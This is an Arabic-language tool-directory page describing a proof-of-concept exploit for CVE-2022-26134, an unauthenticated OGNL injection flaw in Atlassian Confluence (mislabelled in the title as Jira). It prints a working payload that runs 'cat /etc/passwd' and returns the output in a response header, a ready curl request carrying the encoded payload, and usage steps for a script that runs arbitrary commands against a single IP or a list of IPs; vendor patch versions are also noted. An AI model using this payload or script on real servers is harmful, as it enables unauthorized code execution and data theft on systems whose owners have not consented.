Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2022-26134 — مجرد PoC بسيط لاستغلال Atlassian Jira. يتيح تنفيذ الأكواد لمستخدم غير مصرح له على الخادم. | Kitploit
أدوات/GitHubGitHub/iveresk/cve-2022-26134
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubiveresk/cve-2022-26134

cve-2022-26134

مجرد PoC بسيط لاستغلال Atlassian Jira. يتيح تنفيذ الأكواد لمستخدم غير مصرح له على الخادم.

عرض المستودع
1242منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-26134 بواسطة 1vere$k

مجرد إثبات مفهوم (PoC) بسيط لاستغلال أطلاسيان جيرا. يوفر تنفيذ الأكواد لمستخدم غير مصرح له على الخادم.

CVE-2022-26134 - ثغرة حقن OGNL.

سكربت إثبات مفهوم يستغل ثغرة تنفيذ الأكواد عن بُعد التي تؤثر على أطلاسيان كونفلونس 7.18 والمنتجات الأقدم. تسمح ثغرة حقن OGNL لمستخدم غير مصادق بتنفيذ أكواد عشوائية على خادم كونفلونس أو مثيل مركز البيانات.

الحمولة

root@kitploit:~
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

مثال مع أمر CURL:

root@kitploit:~
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D" 

بعد ذلك، ستنعكس نتيجة الأمر في المعامل X-Cmd-Response في ترويسة الاستجابة.

إرشادات التخفيف من الجهات البائعة

اتبع التوصيات الرسمية من أطلاسيان:
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

الإصدارات المُصحَّحة

أصدرت أطلاسيان الإصدارات 7.4.17، 7.13.7، 7.14.3، 7.15.2، 7.16.4، 7.17.4 و7.18.1 والتي تحتوي على تصحيح لهذه المشكلة.

الاستخدام

root@kitploit:~
1. git clone https://github.com/iveresk/cve-2022-26134.git
2. cd cve-2022-26134
3. pip install -r requirements.txt
4. Ex#1: python3 cve-2022-26134.py <IP> <COMMAND> - command is optional - default will be set as "whoami" just to check if your server is vulnerable
5. Ex#2: 4. Ex#1: python3 cve-2022-26134.py <FILE-WITH-IPs> <COMMAND>

الاتصال

يمكنك التواصل معي بحرية عبر Keybase لأي تفاصيل.

تنزيل الأداة